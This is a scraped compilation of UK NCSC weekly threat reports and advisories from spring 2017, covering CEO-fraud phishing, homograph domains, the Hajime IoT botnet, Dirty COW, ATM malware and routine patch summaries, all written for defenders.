NCSC - Weekly Threat Report 5th May 2017

This report is drawn from recent open source reporting

Google and Facebook were victims of Business Email Compromise (BEC) or ‘CEO Fraud’

Google and Facebook have been identified as the victims of an email phishing attack for which a Lithuanian man was charged in March 2017.

The attack relied upon social engineering methods rather than technical intrusion techniques. However, the individual was still able to trick the organisations into transferring over $100 million between 2013-2015, highlighting how cyber-enabled social engineering can be effectively used to commit fraud.

The individual posed as a manufacturer which both firms had existing business relationships with, and sent emails which were designed to look like they came from the manufacturer. The emails contained forged invoices and contracts which appeared to have been signed by executives. This is less technically sophisticated than some other cases of BEC whereby the third-party supplier’s legitimate email is compromised and used to request transfers. The phishing emails were highly targeted, sent to Facebook and Google employees who regularly conducted multi-million dollar transactions with the manufacturer the scammer was impersonating.

Large organisations are especially vulnerable to attacks such as this: often suppliers and individuals have less face to face interaction, and therefore may have reduced opportunities to identify bogus or suspicious transfer requests through conversation.

Fraudulent communication to convince organisations to transfer funds is not new, however it is increasingly common as a low cost, high return crime. Other variations on this attack include

  • Spear-phishing emails co-ordinated with phone calls confirming the email request
  • Impersonation of trusted partners beyond suppliers, including charities, law firms, think tanks or academic institutions
  • Impersonation of fellow employee emails, either through compromising an account, or creating a similar looking fake address
  • Use of social media to research or make contact with potential victims

The NCSC has previously issued guidance on phishing attacks aimed at senior executives or payment departments.

 

Facebook outlines plan to combat information operations

Facebook has outlined measures to combat “information operations”, which it defines as efforts conducted by organisations, including governments, to spread misleading information and falsehoods to “distort domestic or foreign political sentiment". Whilst reporting has focused on the potential impact on democratic processes, manipulation of social media could similarly be used to inflict reputational or even financial damage on organisations. An example of this would be the 2013 fake “alert” from one of America’s most trusted news sources, briefly fooling some news outlets into reporting that an explosion had occurred at the White House and causing the Dow Jones to drop 145 points in two minutes.

Facebook has highlighted that information operations extend beyond the creation of “fake” news stories: other activities such as the dissemination and promotion of stolen information, and targeted data collection on individuals have all been noted. Furthermore, the increased circulation of “fake” news stories to a larger audience is regularly achieved through artificial amplification of posts, whereby paid individuals, often using fake accounts, use techniques such as co-ordinating “likes” to boost the prominence of key postings or creating groups that camouflage propaganda by including legitimate items.

Facebook has stated that it will mitigate the artificial amplification of fake stories using machine learning and analysis to identify bogus accounts, which will then be suspended or deleted. For example, Facebook suspended 30,000 accounts in France prior to the first round of the French presidential election.
 

Vulnerabilities

Mainly platform agnostic/cross platform updates this week, leaning towards Linux and Unix based systems.

Intel released a fix to their Active Management Technology to address a flaw which could allow remote and local users to gain elevated privileges. A mitigation guide has been published here.

IBM released two updates for WebSphere to fix a browser redirect and cross-site request forgery vulnerability, and an update to DB2 to address a bug that could allow a local user to obtain root privileges.

Xen saw a number of updates to fix elevation of privilege bugs.

HPE updated NonStop Server to address a flaw that could allow a remote user to obtain sensitive information, and updated Intelligent Management Center to fix a flaw that could allow for remote code execution.

Elsewhere this week there were updates from Trend Micro to fix cross-site scripting bugs and an elevation of privilege bug. Drupal updated a flaw that could allow access to the target system and FreeBSD fixed a bug which could cause the target to reload.

Debian updates this week include LibreOffice, Ghostscript, Freetype, weechat, Libxstream-Java, MySQL-Connector-Java, Tomcat7 and Tomcat8.

ICS updates this week came from Advantech, CyberVision and Schneider Electric.

No individual sector is anticipated to be impacted more than any other this week.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 28th April 2017

This report is drawn from recent open source reporting

Increase in Homographic Phishing Attacks

Recent media reporting highlights a threefold increase in homographic phishing attacks over the past fourteen months.

Homographic attacks have been widely known about for many years, and rely on the fact there are visual similarities between many different Unicode characters to spoof well-known web addresses using similar-looking Punycode domains. For example, by registering the Unicode domain “www.xn--googl-z8a.com” an attacker would be in control of a web address, which will render in browsers as “www.googlė.com”, almost indistinguishable from the real thing.

Moreover, researchers have recently demonstrated they can use this technique to convert Unicode into ASCII characters in some browsers. By choosing letters from a single foreign language set, an attacker can register a domain that looks identical to a targeted one when rendered by vulnerable browsers. For example, proving the concept, a researcher recently registered the domain name “xn--80ak6aa92e.com”, which renders as “apple.com”.

Mitigations such as using password managers can help users spot fake websites, and therefore help mitigate this threat. In addition, email anti-spoofing measures can help prevent phishing email attacks from reaching users in the first place.


Vulnerabilities

An altogether quieter week than we have seen for a while on the vulnerabilities front. There were a number of updates from Cisco for IOS, ASA, Prime Infrastructure and Prime Network Registrar to fix cross-site scripting attacks, denial of service or target restart vulnerabilities. IBM updated WebSphere and Security Guardium this week to fix escalation of privilege bugs and also updated Domino to fix a remote code execution bug.

Palo Alto fixed an input validation flaw in PAN-OS to prevent cross-site scripting attacks and F5 Networks fixed a denial of service bug in BIG-IP and let users know about a bug in F5 Enterprise Manager which could lead to denial of service conditions, but for which no fix is currently available.

Elsewhere there were updates for Adobe ColdFusion, Apache Batik, Novell NetIQ and cURL/libcurl.

In terms of Debian this week there were updates for MySQL, Python-Django, Icedove/Thunderbird and libav.

Also a quiet week with regard to ICS-specific updates with just two: one for BLF-Tech and one for Sierra Wireless AirLink Raven.

Comment

.author-name { display: none; }

Comment

NCSC - Weekly Threat Report 21st April 2017

Hajime – What is the intent of this IoT Botnet?

In October 2016 the security research group at Rapidity Networks discovered a new malware, called Hajime, with similarities to the Mirai botnet: it targets Internet of Things (IoT or internet-connected) devices by scanning the Internet for devices with network vulnerabilities and attempts to connect to them using known default username/password combinations. According to Symantec, Hajime is believed to have infected between 130, 000 and 180,000 devices worldwide with Brazil and Iran having the most infections followed by Thailand and Russia. Industry partners have suggested that the number of UK devices infected currently stands at approximately 5,000.

Hajime is being compared to the Mirai malware for a number of reasons including: similarities between initial infection vectors; the targeting of internet connected devices and the use of command and control (C2) servers to communicate and send instructions out to infected devices.  Hajime however differs as it adopts a decentralized approach with a Peer to Peer (P2P) model where communication and instructions are passed between infected nodes rather than the more traditional client-server architecture.  It is believed that this type of approach makes the malware much more resilient to take down as it does not rely on just one central server to control the malware.

The Hajime malware is also different because it doesn’t, as yet, appear to have been used for malicious intent.  Researchers have hypothesised that the controllers could be waiting for more devices to be infected before launching an attack.  A more recent theory by researchers is that Hajime has been created by ethical hackers who are targeting Mirai-infected devices with Hajime in order to deny the malware of any harmful activity.

Malware targeting of IoT devices is not new and as these products are becoming more popular amongst consumers, manufacturers and suppliers should be aware of the emerging risks and cyber threats posed when attention is not paid to IoT security.

See the NCSC website for guidance on malware prevention.
 

Insider steals employer’s proprietary trading code

A computer engineer has been charged with illegally exfiltrating the proprietary algorithmic trading model code from a global financial services firm headquartered in New York, where he worked. The code is used by the firm to generate income by predicting market movements.

From December 2016 to March 2017, the engineer took steps to obfuscate his presence on areas of the company’s network that he was not authorised to access. He used discrete areas of the network to collect over three million files, including unencrypted portions of the algorithmic source code, before exfiltrating it.

The motivation for this activity has not been conclusively reported, nor whether this individual acted alone, or on behalf of another. The tasking of insiders by criminals to exploit access to corporate networks is a common occurrence. But the exfiltration of this particular source code is significant because trading platforms could be manipulated to allow vast amounts of money to be stolen in a single attack. Alternatively the intellectual property (IP) could be sold to a rival company.

Companies can mitigate against the insider threat by incorporating security policies that restrict access to the most classified data and installing alerts when unusual activity is taking place.
 

Hotpoint service site compromise

Recent reporting by cyber security company Netcraft noted the compromise of domestic appliance manufacturer Hotpoint’s UK and Irish service websites, which has since been confirmed by Hotpoint in a statement via the Register. Customers accessing the service website were reportedly presented with fake Java dialogs, which if clicked, directed users to possibly malicious third party websites, presenting a risk that users could be infected with malware. Netcraft note that the compromise occurred shortly before the Easter weekend, suggesting that this may have been done deliberately to maximise the impact.

According to the company’s statement, no customer data was compromised and the vulnerabilities were quickly resolved. Netcraft suggest that the site’s WordPress installation may have been responsible. The NCSC provides guidance on minimising the vulnerabilities to WordPress, including the recommendation to implement regular security updates of WordPress as well as any plug-ins, only using trusted plug-ins and replacing default or easy to crack passwords.
 

Vulnerabilities

There have been a large number of updates over the last week, thanks in part at least to Oracle’s quarterly update cycle falling this week. Oracle’s updates affect multiple bugs in many of their products, from PeopleSoft, E-Business Suite, Financial Services, Java SA to MySQL, WebLogic and Solaris.

Both Mozilla and Google released updates to fix multiple vulnerabilities, the most serious of which could allow remote code execution, in their browser products, Firefox and Chrome respectively and there were three updates for BIND.

Magento saw an update to prevent the uploading of arbitrary files and remote users conducting cross-site request forgery attacks. There were also a number of updates from Cisco for ASA, IOS and Unified Communications Manager. Juniper released a number of updates for Junos.

On the virtualisation front there were updates this week for both VMware and VirtualBox.

Elsewhere this week there were updates for SquirrelMail, WatchGuard, Nessus, Wireshark and MatnisBT.

On the Debian side this week saw updates for Firefox-ESR and ICU. ICS specific updates this week came from Belden Hirschmann, Schneider Electric and Wecon.

Comment

.author-name { display: none; }

Comment

Advisory: ‘Dirty COW’ Linux privilege escalation vulnerability being actively exploited

Executive Summary

A vulnerability has been discovered in the Linux kernel which could give untrusted users unfettered root access. This vulnerability has been present in the Linux kernel for nine years but has only just been discovered. The vulnerability allows for privilege escalation that can be exploited easily and reliably. The fact that this flaw exists in nearly every version of Linux from at least the last nine years means this vulnerability should be taken seriously and patched as soon as distribution specific patches are available.

What it is?

As their names suggest, privilege escalation vulnerabilities allow attackers with only limited access to target a computer and gain much greater access rights, and therefore control over the system. The vulnerability itself, known as a race condition, involves the way Linux memory handles a duplication technique called copy-onwrite. Untrusted users can exploit it to gain highly privileged write-access rights to memory mappings that would normally be read-only. More technical details about the vulnerability and exploit are available below. Using the acronym derived from ‘copy-onwrite’, some researchers have dubbed the vulnerability ‘Dirty COW’.

Which products are affected?

The vulnerability affects most versions of Linux released in the last nine years, which given the ubiquity of the open source operating system, means a large number of unpatched systems are potentially exposed to the exploit. Researchers are already claiming to see the Dirty COW vulnerability being exploited out in the wild.

What could happen if the vulnerabilities were exploited?

These exploits could be used against Web hosting providers that provide shell access, such that one customer could attack other customers or service administrators.

Privilege escalation exploits can also be combined with other attacks to target other vulnerabilities. A SQL injection weakness in a website, for instance, often allows attackers to run malicious code only as an untrusted user. Combined with an escalation exploit an attacker could achieve root access.

How can I find out if I am at risk?

If you are using a Linux distribution released in the last nine years then this system is likely to be vulnerable if it hasn’t been recently patched.

How can I tell if this exploit has been used against me?

It would be very difficult to determine if you have been the victim of this type of attack since exploitation of this bug does not leave any trace of anything abnormal in the logs. Further activity or attacks following post-privilege exploitation itself could leave more evidence of exploitation.

What can I do?

The underlying bug was patched this week by the maintainers of the official Linux kernel. Downstream distributors are in the process of releasing updates that incorporate the fix. Red Hat has classified the vulnerability as "important". Other distributions have released patches and these should be tested and applied as soon as possible.

Comment

.author-name { display: none; }

Comment

Threat to Managed Service Providers

Threat to Managed Service Providers

A major cyber campaign against Managed Service providers has been detected that may present risks to organisations using outsourced IT services. 

Media references to terrorist cyber capability

There have been numerous reports on the recently imposed restrictions on electronic devices larger than a smartphone being allowed in cabin baggage on flights from certain countries in the Middle East, North Africa and Turkey. A statement from the US Department of Homeland Security (DHS) said: "Evaluated intelligence indicates that terrorist groups continue to target commercial aviation, to include smuggling explosive devices in various consumer items". This physical terrorist threat to aviation is entirely separate from news reports suggesting a raised cyber terrorist threat against the civil nuclear sector. As highlighted in the recent NCSC/NCA Annual Report, the NCSC assesses that terrorist organisations currently have limited cyber capability. While they may aspire to cause a destructive cyber attack, this remains unlikely.

Malware Threat to ATMs

A fileless malware campaign that successfully targeted 140 organisations worldwide earlier this year has evolved. Criminals are now exploiting their remote access to banks' networks to drop additional malware called ATMitch, enabling them to issue remote commands to compromised ATMs to dispense cash. Banks in Russia and Kazakhstan have reportedly been victims of this malware.

Although we have previously seen cyber-criminals use malware to steal cash from ATMs, their use of a banks' internal network to remotely deliver ATM malware is a new and more sophisticated form of attack. Also, the use of fileless malware allows criminals to delete malicious commands from the ATM's hard drive, removing all traces of an attack.

There have been no reported incidents of network-delivered ATM malware attacks against UK ATMs to date. The most common attacks seen against UK ATMs continue to be more traditional physical attacks, which criminals carry out to varying levels of success. For more information on the malware threat to UK ATMs, log in to the Cyber-security Information Sharing Partnership (CiSP) to view our recently published report. Please see details on how to become a member of CiSP.

Rise in compromised websites

According to a recent Google report, the number of websites that were hacked in 2016 was 32% higher than in 2015. Google assess this trend is unlikely to lose momentum "as hackers get more aggressive and more sites become outdated".

Although it is difficult to corroborate this statistic or clarify what proportion of the allegedly compromised websites were active, the threat to websites from cybercriminals has definitely risen over recent years, with ransomware and financial scams particularly strong incentives for them to compromise websites in order to facilitate cybercrime.

Google say this problem was compounded by the fact that 61% of webmasters, whose websites were breached had not registered with Google's channel for communicating site health alerts, Search Console, and were therefore not notified by Google of the compromise.

The NCSC recommend that website owners follow NCSC guidance and regularly patch known vulnerabilities to reduce the risk of a compromise. We recommend that the public follow the malware prevention advice in 10 steps to cyber security to reduce the risk of being infected by malware from infected websites, and you may also find our guidance on designing digital services useful. Following the guidance can help prevent some of the most prevalent types of web attacks that are being carried out currently.

Website owners may also find OWASP's Top 10 project, which represents a broad consensus about what the most critical web application security flaws are, useful.

Vulnerabilities

Reports came in this week of a WebDAV buffer overflow vulnerability affecting Microsoft's Internet Information Server (IIS). There are reports that this vulnerability is being actively exploited and at the time of writing Microsoft do not yet have a fix available. NIST's National Vulnerability Database (NVD) has details. NCSC recommends where there is still a need for on premises installs, that people use the latest versions of software (Server 2016 in this case) as it more secure by default. If we receive more information on this vulnerability we will update accordingly.

Apple released an update for their iOS mobile operating system to fix a bug that could allow remote code execution within Wi-Fi range of the device.

McAfee ePolicy Orchestrator fixed a flaw in the anti-malware engine that could allow local users to cause denial of service conditions. RSA Archer GRC Security Operations Management resolved an error where local users could view passwords. Django suffered from an input validation error that could lead to remote users conducting cross-site scripting and open redirect attacks.

Elsewhere this week there were updates from HPE Business Process Monitor, Asterisk, MantisBT, PHP, WebsiteBaker, the Linux Kernel and Splunk.

Debian specific updates this week were for Samba to fix a regression bug, Firebird2.5 and Tryton-server.

ICS updates this week included several from Schneider Electric (Wonderware, Modicon Interactive Graphical SCADA), Siemens RUGGEDCON ROX I, Rockwell Automation Allen-Bradley Stratix Allen-Bradley ArmorStratix, Miele, Marel Food Processing, LCDS, BD Kiestra and 3S-Smart.

Comment

.author-name { display: none; }

Comment

Criminals target US healthcare sector

Criminals target US healthcare sector

The cyber division of the FBI recently issued an alert warning of criminal activity targeting File Transfer Protocol (FTP) servers operating in ‘anonymous’ mode, associated with the US medical and dental facilities.

The criminals involved are reportedly motivated by the potential to access protected health information (PHI) and personally identifiable information (PII). This data is then used by criminals to extort healthcare business owners, and to conduct financial fraud and identity theft.

The US healthcare sector has previously been targeted by ransomware campaigns, however this attack methodology is more aggressive in nature. Rather than encrypting data and releasing it following payment of a ransom, criminals are stealing sensitive data and in some instances threatening to expose it or sell it, to pressure victim companies to pay.

FTP is a protocol widely used in the transfer of data and files. However, when FTP servers are configured in a way that enables user authentication with generic usernames and no passwords, it leaves data stored on these servers vulnerable. This was highlighted by research conducted by the University of Michigan in 2015, which showed more than one million FTP servers were misconfigured, potentially allowing unauthorised access to data.

The US healthcare sector is singled out in the FBI report as the target of an active criminal campaign, however any organisation storing sensitive data on a misconfigured FTP server could similarly be exposed to extortion or fraud.

Asian cyber criminals demonstrate ongoing professionalisation

According to a report by security research group Check Point, cyber criminals in Asia are using fake mobile base stations to impersonate legitimate telecommunications companies while conducting SMS phishing ('SMiShing') campaigns. Their text messages link to malware dubbed the "Swearing Trojan" (due to the profanity included in its code) which steals bank details. It circumvents mobile-based two-factor authentication by replacing text messenger apps with malicious duplicates.

SMS spam is a lucrative business for criminals in Asia, who can also mount fake base stations in a vehicle and drive through cities. Nearby mobile devices mistakenly connect to the high power signal, allowing the spammers to transmit large numbers of SMS messages, often displaying false sender information, without paying network fees.

SMS spam is currently less common in the UK and, unlike email spammers, operators rarely operate across national borders due to the cost of sending text messages internationally. Nevertheless, this development abroad illustrates the ongoing professionalisation of cyber crime, and the readiness of criminals to combine existing techniques in innovative ways to exploit their victims. One of the themes over the last year, as reported in the joint NCA/NCSC cyber threat report 2016-17 is that the risk from cyber crime is growing as criminals become more creative.

Comment

.author-name { display: none; }

Comment

Two major US technology firms 'tricked out of $100m'

Evaldas Rimasauskas posed as Asian-based hardware manufacturer to trick staff into wiring him money

Evaldas Rimasauskas posed as Asian-based hardware manufacturer to trick staff into wiring him money

A Lithuanian man has been charged with tricking two US technology firms into wiring him $100m (£80.3m) through an email phishing scam.

Posing as an Asian-based manufacturer, Evaldas Rimasauskas tricked staff into transferring money into bank accounts under his control, US officials said.

The companies were not named but were described as US-based multinationals, with one operating in social media.

Officials called it a wake-up call for even "the most sophisticated" firms.

According to the US Department of Justice, Mr Rimasauskas, 48 - who was arrested in Lithuania last week - deceived the firms from at least 2013 up until 2015.

He allegedly registered a company in Latvia which bore the same name as an Asian-based computer hardware manufacturer and opened various accounts in its name at several banks.

'Fake email accounts'

The DoJ said: "Thereafter, fraudulent phishing emails were sent to employees and agents of the victim companies, which regularly conducted multimillion-dollar transactions with [the Asian] company."

The emails, which "purported" to be from employees and agents of the Asian firm, and were sent from fake email accounts, directed money for legitimate goods and services into Mr Rimasauskas's accounts, the DoJ said.

The cash was then "wired into different bank accounts" in locations around the world - including Latvia, Cyprus, Slovakia, Lithuania, Hungary and Hong Kong.

He also "forged invoices, contracts and letters" to hide his fraud from the banks he used.

Officials said Mr Rimasauskas siphoned off more than $100m in total, although much of the stolen money has been recovered.

Acting US Attorney Joon H Kim said: "This case should serve as a wake-up call to all companies... that they too can be victims of phishing attacks by cybercriminals.

"And this arrest should serve as a warning to all cybercriminals that we will work to track them down, wherever they are, to hold them accountable."

The DoJ would not comment on possible extradition arrangements and said that no trial date had been set.

Comment

.author-name { display: none; }